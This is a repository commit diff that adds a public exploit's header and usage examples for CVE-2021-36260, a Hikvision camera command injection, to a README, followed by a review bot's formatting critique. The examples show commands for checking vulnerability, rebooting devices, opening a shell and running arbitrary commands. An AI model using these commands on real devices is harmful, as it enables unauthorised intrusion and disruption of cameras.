Projects STRLCPY CVE-2021-36260 Commits 5645bf9a
    README.md
    1 1  # CVE-2021-36260
    2 2  command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.
    3 3   
     4 +# Exploit Title: Hikvision Web Server Build 210702 - Command Injection
     5 +# Exploit Author: bashis
     6 +# Vendor Homepage: https://www.hikvision.com/
     7 +# Version: 1.0
     8 +# CVE: CVE-2021-36260
     9 +# Reference: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html
     10 + 
     11 +# All credit to Watchful_IP
     12 + 
     13 +#!/usr/bin/env python3
     14 + 
     15 +"""
     16 +Note:
     17 +1) This code will _not_ verify if remote is Hikvision device or not.
     18 +2) Most of my interest in this code has been concentrated on how to
     19 + reliably detect vulnerable and/or exploitable devices.
     20 + Some devices are easy to detect, verify and exploit the vulnerability,
     21 + other devices may be vulnerable but not so easy to verify and exploit.
     22 + I think the combined verification code should have very high accuracy.
     23 +3) 'safe check' (--check) will try write and read for verification
     24 + 'unsafe check' (--reboot) will try reboot the device for verification
     25 + 
     26 +[Examples]
     27 +Safe vulnerability/verify check:
     28 + $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check
     29 + 
     30 +Safe and unsafe vulnerability/verify check:
     31 +(will only use 'unsafe check' if not verified with 'safe check')
     32 + $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot
     33 + 
     34 +Unsafe vulnerability/verify check:
     35 + $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot
     36 + 
     37 +Launch and connect to SSH shell:
     38 + $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell
     39 + 
     40 +Execute command:
     41 + $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd "ls -l"
     42 + 
     43 +Execute blind command:
     44 + $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind "reboot"
     45 + 
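Review bot: Added lines 4-13 are Python comment lines placed in README.md, so Markdown will render `# Exploit Title: ...`, `# CVE: CVE-2021-36260` and `# All credit to Watchful_IP` each as a top-level heading, and `#!/usr/bin/env python3` on line 13 has no effect as a shebang because it is not the first line of a file. If this is meant to be the script, it belongs in `CVE-2021-36260.py` (the name the usage examples invoke) with the shebang on line 1. If it is meant as documentation, the header and the `[Examples]` section should sit inside a code block so the `#` and `$` lines display literally. The docstring opened with `"""` on line 15 is also not closed anywhere in the lines shown, and `# Version: 1.0` does not say whether it is the script's version or a firmware version, while the title refers to "Build 210702".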